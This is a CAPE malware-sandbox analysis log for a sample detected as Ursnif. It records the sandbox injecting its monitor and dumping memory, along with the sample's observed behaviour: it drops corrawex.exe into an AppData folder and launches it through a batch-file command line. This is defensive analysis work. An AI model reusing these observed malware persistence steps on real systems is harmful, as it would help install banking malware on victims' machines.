CAPE

Detections: Ursnif


Analysis

Category Package Started Completed Duration Options Log
FILE Extraction 2020-03-24 09:47:00 2020-03-24 09:50:57 237 seconds Show Options Show Log
route = internet
procdump = 0
2020-03-24 09:47:01,000 [root] INFO: Date set to: 03-24-20, time set to: 09:47:01, timeout set to: 200
2020-03-24 09:47:01,046 [root] DEBUG: Starting analyzer from: C:\ejkbjgk
2020-03-24 09:47:01,046 [root] DEBUG: Storing results at: C:\aWpAMaeYY
2020-03-24 09:47:01,046 [root] DEBUG: Pipe server name: \\.\PIPE\EqkKvCpskh
2020-03-24 09:47:01,046 [root] INFO: Analysis package "Extraction" has been specified.
2020-03-24 09:47:02,855 [root] DEBUG: Started auxiliary module Browser
2020-03-24 09:47:02,855 [root] DEBUG: Started auxiliary module Curtain
2020-03-24 09:47:02,855 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2020-03-24 09:47:03,808 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-03-24 09:47:03,808 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-03-24 09:47:03,808 [root] DEBUG: Started auxiliary module DigiSig
2020-03-24 09:47:03,808 [root] DEBUG: Started auxiliary module Disguise
2020-03-24 09:47:03,808 [root] DEBUG: Started auxiliary module Human
2020-03-24 09:47:03,808 [root] DEBUG: Started auxiliary module Screenshots
2020-03-24 09:47:03,822 [root] DEBUG: Started auxiliary module Sysmon
2020-03-24 09:47:03,822 [root] DEBUG: Started auxiliary module Usage
2020-03-24 09:47:03,822 [root] INFO: Analyzer: DLL set to Extraction.dll from package modules.packages.Extraction
2020-03-24 09:47:03,822 [root] INFO: Analyzer: DLL_64 set to Extraction_x64.dll from package modules.packages.Extraction
2020-03-24 09:47:03,838 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe" with arguments "" with pid 420
2020-03-24 09:47:03,838 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:03,838 [lib.api.process] INFO: 32-bit DLL to inject is C:\ejkbjgk\dll\muIYPR.dll, loader C:\ejkbjgk\bin\qeYgInZ.exe
2020-03-24 09:47:03,869 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\EqkKvCpskh.
2020-03-24 09:47:03,869 [root] DEBUG: Loader: Injecting process 420 (thread 264) with C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:03,869 [root] DEBUG: Process image base: 0x00400000
2020-03-24 09:47:03,901 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:03,901 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:47:03,901 [root] DEBUG: Successfully injected DLL C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:03,901 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 420
2020-03-24 09:47:05,914 [lib.api.process] INFO: Successfully resumed process with pid 420
2020-03-24 09:47:05,914 [root] INFO: Added new process to list with pid: 420
2020-03-24 09:47:06,069 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:47:06,069 [root] DEBUG: Process dumps disabled.
2020-03-24 09:47:06,131 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:47:06,131 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:06,131 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:06,131 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:06,131 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:06,131 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2020-03-24 09:47:06,131 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x3b0000
2020-03-24 09:47:06,131 [root] DEBUG: Debugger initialised.
2020-03-24 09:47:06,131 [root] DEBUG: CAPE initialised: 32-bit Extraction package loaded in process 420 at 0x74870000, image base 0x400000, stack from 0x186000-0x190000
2020-03-24 09:47:06,131 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe".
2020-03-24 09:47:06,131 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x00400000) returned 0x00000000.
2020-03-24 09:47:06,131 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x00000000.
2020-03-24 09:47:06,131 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x00400000) -> AllocationBase 0x00400000 RegionSize 0x4096.
2020-03-24 09:47:06,131 [root] DEBUG: AddTrackedRegion: EntryPoint 0x5493, Entropy 7.765381e+00
2020-03-24 09:47:06,131 [root] DEBUG: AddTrackedRegion: New region at 0x00400000 size 0x1000 added to tracked regions.
2020-03-24 09:47:06,131 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2020-03-24 09:47:06,131 [root] INFO: Monitor successfully loaded in process with pid 420.
2020-03-24 09:47:06,148 [root] DEBUG: DLL loaded at 0x74500000: C:\Windows\system32\asycfilt (0x14000 bytes).
2020-03-24 09:47:06,413 [root] DEBUG: set_caller_info: Adding region at 0x03950000 to caller regions list (ntdll::LdrGetDllHandle).
2020-03-24 09:47:06,413 [root] DEBUG: Allocation: 0x003C0000 - 0x003C1000, size: 0x1000, protection: 0x40.
2020-03-24 09:47:06,413 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-03-24 09:47:06,427 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-03-24 09:47:06,427 [root] DEBUG: ProcessImageBase: EP 0x00005493 image base 0x00400000 size 0x0 entropy 7.765580e+00.
2020-03-24 09:47:06,427 [root] DEBUG: AllocationHandler: Adding allocation to tracked region list: 0x003C0000, size: 0x1000.
2020-03-24 09:47:06,427 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x003C0000) returned 0x00000000.
2020-03-24 09:47:06,427 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x00000000.
2020-03-24 09:47:06,427 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x003C0000) -> AllocationBase 0x003C0000 RegionSize 0x4096.
2020-03-24 09:47:06,427 [root] DEBUG: AddTrackedRegion: New region at 0x003C0000 size 0x1000 added to tracked regions.
2020-03-24 09:47:06,427 [root] DEBUG: set_caller_info: Adding region at 0x003C0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 09:47:06,427 [root] DEBUG: set_caller_info: Caller at 0x003C05FF in tracked regions.
2020-03-24 09:47:06,427 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-03-24 09:47:06,427 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-03-24 09:47:06,427 [root] DEBUG: ProcessImageBase: EP 0x00005493 image base 0x00400000 size 0x0 entropy 7.765580e+00.
2020-03-24 09:47:06,427 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x003C0000.
2020-03-24 09:47:06,427 [root] DEBUG: DumpPEsInRange: Scanning range 0x3c0000 - 0x3c1000.
2020-03-24 09:47:06,427 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x3c0000-0x3c1000.
2020-03-24 09:47:06,427 [root] DEBUG: DumpPEsInTrackedRegion: No PE images found in range range 0x003C0000 - 0x003C1000.
2020-03-24 09:47:06,427 [root] DEBUG: set_caller_info: Adding region at 0x020D0000 to caller regions list (kernel32::GetSystemTime).
2020-03-24 09:47:06,427 [root] DEBUG: DumpPEsInRange: Scanning range 0x3c0000 - 0x3c1000.
2020-03-24 09:47:06,427 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x3c0000-0x3c1000.
2020-03-24 09:47:06,427 [root] DEBUG: DumpPEsInTrackedRegion: No PE images found in range range 0x003C0000 - 0x003C1000.
2020-03-24 09:47:06,427 [root] DEBUG: DumpMemory: CAPE output file C:\aWpAMaeYY\CAPE\420_5287705206471224232020 successfully created, size 0x1000
2020-03-24 09:47:06,427 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\420_5287705206471224232020
2020-03-24 09:47:06,427 [root] DEBUG: DumpRegion: Dumped stack region from 0x003C0000, size 0x1000.
2020-03-24 09:47:06,427 [root] DEBUG: ProcessTrackedRegion: dumped executable memory range at 0x003C0000.
2020-03-24 09:47:06,427 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x3c0000 - 0x3c1000.
2020-03-24 09:47:06,427 [root] DEBUG: DumpMemory: CAPE output file C:\aWpAMaeYY\CAPE\420_4677356326471224232020 successfully created, size 0x1000
2020-03-24 09:47:06,444 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\420_4677356326471224232020
2020-03-24 09:47:06,444 [root] DEBUG: DumpRegion: Dumped stack region from 0x003C0000, size 0x1000.
2020-03-24 09:47:06,444 [root] DEBUG: ProcessTrackedRegion: dumped executable memory range at 0x003C0000.
2020-03-24 09:47:06,444 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x3c0000 - 0x3c1000.
2020-03-24 09:47:06,444 [root] DEBUG: ProtectionHandler: Address 0x00401000 already in tracked region at 0x00400000, size 0x1000
2020-03-24 09:47:06,444 [root] DEBUG: ProtectionHandler: Address: 0x00401000 (alloc base 0x00400000), NumberOfBytesToProtect: 0x6000, NewAccessProtection: 0x20
2020-03-24 09:47:06,444 [root] DEBUG: ProtectionHandler: Increased region size at 0x00401000 to 0x7000.
2020-03-24 09:47:06,444 [root] DEBUG: ProtectionHandler: Updated region protection at 0x00401000 to 0x20.
2020-03-24 09:47:06,444 [root] DEBUG: ProcessImageBase: EP 0x000010E7 image base 0x00400000 size 0x0 entropy 7.796518e+00.
2020-03-24 09:47:06,444 [root] DEBUG: ProcessImageBase: Modified entry point (0x000010E7) detected at image base 0x00400000 - dumping.
2020-03-24 09:47:06,444 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:47:06,444 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-03-24 09:47:06,444 [root] DEBUG: DumpProcess: Module entry point VA is 0x000010E7.
2020-03-24 09:47:06,444 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\420_609005564647924232020
2020-03-24 09:47:06,444 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x8a00.
2020-03-24 09:47:06,460 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2020-03-24 09:47:06,460 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2020-03-24 09:47:06,460 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2020-03-24 09:47:06,460 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2020-03-24 09:47:06,474 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2020-03-24 09:47:18,767 [root] DEBUG: DLL loaded at 0x75470000: C:\Windows\syswow64\WINTRUST (0x2d000 bytes).
2020-03-24 09:47:18,829 [root] DEBUG: DLL loaded at 0x74400000: C:\Windows\system32\PROPSYS (0xf5000 bytes).
2020-03-24 09:47:18,829 [root] DEBUG: DLL loaded at 0x74260000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2020-03-24 09:47:18,829 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2020-03-24 09:47:18,845 [root] DEBUG: DLL loaded at 0x74940000: C:\Windows\system32\ntmarta (0x21000 bytes).
2020-03-24 09:47:18,861 [root] DEBUG: DLL loaded at 0x747D0000: C:\Windows\system32\profapi (0xb000 bytes).
2020-03-24 09:47:18,861 [root] DEBUG: DLL unloaded from 0x75E70000.
2020-03-24 09:47:18,877 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:47:18,940 [root] DEBUG: DLL loaded at 0x74200000: C:\Windows\System32\shdocvw (0x2e000 bytes).
2020-03-24 09:47:18,954 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2020-03-24 09:47:19,002 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2020-03-24 09:47:19,002 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2020-03-24 09:47:19,079 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2872
2020-03-24 09:47:19,079 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:19,079 [lib.api.process] INFO: 32-bit DLL to inject is C:\ejkbjgk\dll\muIYPR.dll, loader C:\ejkbjgk\bin\qeYgInZ.exe
2020-03-24 09:47:19,079 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\EqkKvCpskh.
2020-03-24 09:47:19,079 [root] DEBUG: Loader: Injecting process 2872 (thread 1748) with C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,079 [root] DEBUG: Process image base: 0x4A310000
2020-03-24 09:47:19,079 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,079 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:47:19,079 [root] DEBUG: Successfully injected DLL C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,079 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2872
2020-03-24 09:47:19,095 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2872
2020-03-24 09:47:19,095 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:19,095 [lib.api.process] INFO: 32-bit DLL to inject is C:\ejkbjgk\dll\muIYPR.dll, loader C:\ejkbjgk\bin\qeYgInZ.exe
2020-03-24 09:47:19,095 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\EqkKvCpskh.
2020-03-24 09:47:19,095 [root] DEBUG: Loader: Injecting process 2872 (thread 1748) with C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,095 [root] DEBUG: Process image base: 0x4A310000
2020-03-24 09:47:19,095 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,095 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:47:19,095 [root] DEBUG: Successfully injected DLL C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,095 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2872
2020-03-24 09:47:19,095 [root] DEBUG: DLL unloaded from 0x74F40000.
2020-03-24 09:47:19,095 [root] DEBUG: DLL unloaded from 0x75E70000.
2020-03-24 09:47:19,095 [root] DEBUG: DLL unloaded from 0x74200000.
2020-03-24 09:47:19,095 [root] DEBUG: DLL unloaded from 0x74400000.
2020-03-24 09:47:19,095 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:47:19,095 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 420).
2020-03-24 09:47:19,095 [root] DEBUG: Process dumps disabled.
2020-03-24 09:47:19,095 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-03-24 09:47:19,095 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-03-24 09:47:19,111 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:19,111 [root] DEBUG: ProcessImageBase: EP 0x000010E7 image base 0x00400000 size 0x0 entropy 7.678644e+00.
2020-03-24 09:47:19,111 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x003C0000.
2020-03-24 09:47:19,111 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:47:19,111 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2020-03-24 09:47:19,111 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0xc0000
2020-03-24 09:47:19,111 [root] DEBUG: Debugger initialised.
2020-03-24 09:47:19,111 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x407000.
2020-03-24 09:47:19,111 [root] DEBUG: CAPE initialised: 32-bit Extraction package loaded in process 2872 at 0x74870000, image base 0x4a310000, stack from 0x193000-0x290000
2020-03-24 09:47:19,111 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2020-03-24 09:47:19,111 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\cmd \c ""C:\Users\user\AppData\Local\Temp\E502\D8E1.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE"".
2020-03-24 09:47:19,111 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:47:19,111 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x4A310000) returned 0x00000000.
2020-03-24 09:47:19,111 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x00000000.
2020-03-24 09:47:19,111 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-03-24 09:47:19,111 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x4A310000) -> AllocationBase 0x4A310000 RegionSize 0x4096.
2020-03-24 09:47:19,111 [root] DEBUG: DumpProcess: Module entry point VA is 0x000010E7.
2020-03-24 09:47:19,111 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x407000.
2020-03-24 09:47:19,111 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2020-03-24 09:47:19,111 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:47:19,111 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-03-24 09:47:19,127 [root] DEBUG: DumpProcess: Module entry point VA is 0x000010E7.
2020-03-24 09:47:19,127 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\420_64923645939471224232020
2020-03-24 09:47:19,127 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x8200.
2020-03-24 09:47:19,127 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400200-0x407000.
2020-03-24 09:47:19,127 [root] DEBUG: DumpPEsInTrackedRegion: Dumped 1 PE image(s) from range 0x00400000 - 0x00407000.
2020-03-24 09:47:19,127 [root] DEBUG: AddTrackedRegion: EntryPoint 0x829a, Entropy 4.485988e+00
2020-03-24 09:47:19,127 [root] DEBUG: ProcessTrackedRegion: Found and dumped PE image(s) in range 0x00400000 - 0x00407000.
2020-03-24 09:47:19,127 [root] DEBUG: AddTrackedRegion: New region at 0x4A310000 size 0x1000 added to tracked regions.
2020-03-24 09:47:19,127 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x400000 - 0x407000.
2020-03-24 09:47:19,127 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2020-03-24 09:47:19,127 [root] INFO: Added new process to list with pid: 2872
2020-03-24 09:47:19,127 [root] INFO: Monitor successfully loaded in process with pid 2872.
2020-03-24 09:47:19,127 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\420_39546201239471224232020
2020-03-24 09:47:19,127 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x8200.
2020-03-24 09:47:19,127 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400200-0x407000.
2020-03-24 09:47:19,127 [root] DEBUG: DumpPEsInTrackedRegion: Dumped 1 PE image(s) from range 0x00400000 - 0x00407000.
2020-03-24 09:47:19,127 [root] DEBUG: ProcessTrackedRegion: Found and dumped PE image(s) in range 0x00400000 - 0x00407000.
2020-03-24 09:47:19,127 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x400000 - 0x407000.
2020-03-24 09:47:19,141 [root] INFO: Announced 32-bit process name: cmd.exe pid: 992
2020-03-24 09:47:19,141 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:19,141 [lib.api.process] INFO: 32-bit DLL to inject is C:\ejkbjgk\dll\muIYPR.dll, loader C:\ejkbjgk\bin\qeYgInZ.exe
2020-03-24 09:47:19,141 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\EqkKvCpskh.
2020-03-24 09:47:19,141 [root] DEBUG: Loader: Injecting process 992 (thread 1428) with C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,141 [root] DEBUG: Process image base: 0x4A310000
2020-03-24 09:47:19,141 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,141 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:47:19,141 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 09:47:19,141 [root] DEBUG: Successfully injected DLL C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,157 [root] DEBUG: DLL unloaded from 0x74940000.
2020-03-24 09:47:19,157 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 992
2020-03-24 09:47:19,157 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 420).
2020-03-24 09:47:19,157 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-03-24 09:47:19,157 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:47:19,157 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-03-24 09:47:19,157 [root] DEBUG: ProcessImageBase: EP 0x000010E7 image base 0x00400000 size 0x0 entropy 7.678644e+00.
2020-03-24 09:47:19,157 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x003C0000.
2020-03-24 09:47:19,157 [root] INFO: Notified of termination of process with pid 420.
2020-03-24 09:47:19,174 [root] INFO: Announced 32-bit process name: cmd.exe pid: 992
2020-03-24 09:47:19,174 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:19,174 [lib.api.process] INFO: 32-bit DLL to inject is C:\ejkbjgk\dll\muIYPR.dll, loader C:\ejkbjgk\bin\qeYgInZ.exe
2020-03-24 09:47:19,204 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\EqkKvCpskh.
2020-03-24 09:47:19,204 [root] DEBUG: Loader: Injecting process 992 (thread 1428) with C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,220 [root] DEBUG: Process image base: 0x4A310000
2020-03-24 09:47:19,236 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,236 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:47:19,236 [root] DEBUG: Successfully injected DLL C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,236 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 992
2020-03-24 09:47:19,252 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:47:19,252 [root] DEBUG: Process dumps disabled.
2020-03-24 09:47:19,266 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:19,266 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:47:19,266 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2020-03-24 09:47:19,266 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x170000
2020-03-24 09:47:19,282 [root] DEBUG: Debugger initialised.
2020-03-24 09:47:19,282 [root] DEBUG: CAPE initialised: 32-bit Extraction package loaded in process 992 at 0x74870000, image base 0x4a310000, stack from 0x273000-0x370000
2020-03-24 09:47:19,282 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\cmd  \C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE"".
2020-03-24 09:47:19,282 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x4A310000) returned 0x00000000.
2020-03-24 09:47:19,298 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x00000000.
2020-03-24 09:47:19,298 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x4A310000) -> AllocationBase 0x4A310000 RegionSize 0x4096.
2020-03-24 09:47:19,298 [root] DEBUG: AddTrackedRegion: EntryPoint 0x829a, Entropy 4.485988e+00
2020-03-24 09:47:19,298 [root] DEBUG: AddTrackedRegion: New region at 0x4A310000 size 0x1000 added to tracked regions.
2020-03-24 09:47:19,298 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2020-03-24 09:47:19,298 [root] INFO: Added new process to list with pid: 992
2020-03-24 09:47:19,298 [root] INFO: Monitor successfully loaded in process with pid 992.
2020-03-24 09:47:19,313 [root] INFO: Announced 32-bit process name: corrawex.exe pid: 2512
2020-03-24 09:47:19,313 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:19,313 [lib.api.process] INFO: 32-bit DLL to inject is C:\ejkbjgk\dll\muIYPR.dll, loader C:\ejkbjgk\bin\qeYgInZ.exe
2020-03-24 09:47:19,313 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\EqkKvCpskh.
2020-03-24 09:47:19,313 [root] DEBUG: Loader: Injecting process 2512 (thread 1304) with C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,313 [root] DEBUG: Process image base: 0x00400000
2020-03-24 09:47:19,313 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,313 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:47:19,329 [root] DEBUG: Successfully injected DLL C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,329 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2512
2020-03-24 09:47:19,329 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:47:19,345 [root] INFO: Announced 32-bit process name: corrawex.exe pid: 2512
2020-03-24 09:47:19,345 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:19,345 [lib.api.process] INFO: 32-bit DLL to inject is C:\ejkbjgk\dll\muIYPR.dll, loader C:\ejkbjgk\bin\qeYgInZ.exe
2020-03-24 09:47:19,345 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\EqkKvCpskh.
2020-03-24 09:47:19,345 [root] DEBUG: Loader: Injecting process 2512 (thread 1304) with C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,345 [root] DEBUG: Process image base: 0x00400000
2020-03-24 09:47:19,345 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,361 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:47:19,361 [root] DEBUG: Successfully injected DLL C:\ejkbjgk\dll\muIYPR.dll.
2020-03-24 09:47:19,361 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2512
2020-03-24 09:47:19,361 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:47:19,361 [root] DEBUG: Process dumps disabled.
2020-03-24 09:47:19,391 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:19,391 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:47:19,391 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2020-03-24 09:47:19,391 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x3d0000
2020-03-24 09:47:19,391 [root] DEBUG: Debugger initialised.
2020-03-24 09:47:19,391 [root] DEBUG: CAPE initialised: 32-bit Extraction package loaded in process 2512 at 0x74870000, image base 0x400000, stack from 0x186000-0x190000
2020-03-24 09:47:19,391 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe"  "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE".
2020-03-24 09:47:19,407 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x00400000) returned 0x00000000.
2020-03-24 09:47:19,407 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x00000000.
2020-03-24 09:47:19,407 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x00400000) -> AllocationBase 0x00400000 RegionSize 0x4096.
2020-03-24 09:47:19,407 [root] DEBUG: AddTrackedRegion: EntryPoint 0x5493, Entropy 7.765386e+00
2020-03-24 09:47:19,407 [root] DEBUG: AddTrackedRegion: New region at 0x00400000 size 0x1000 added to tracked regions.
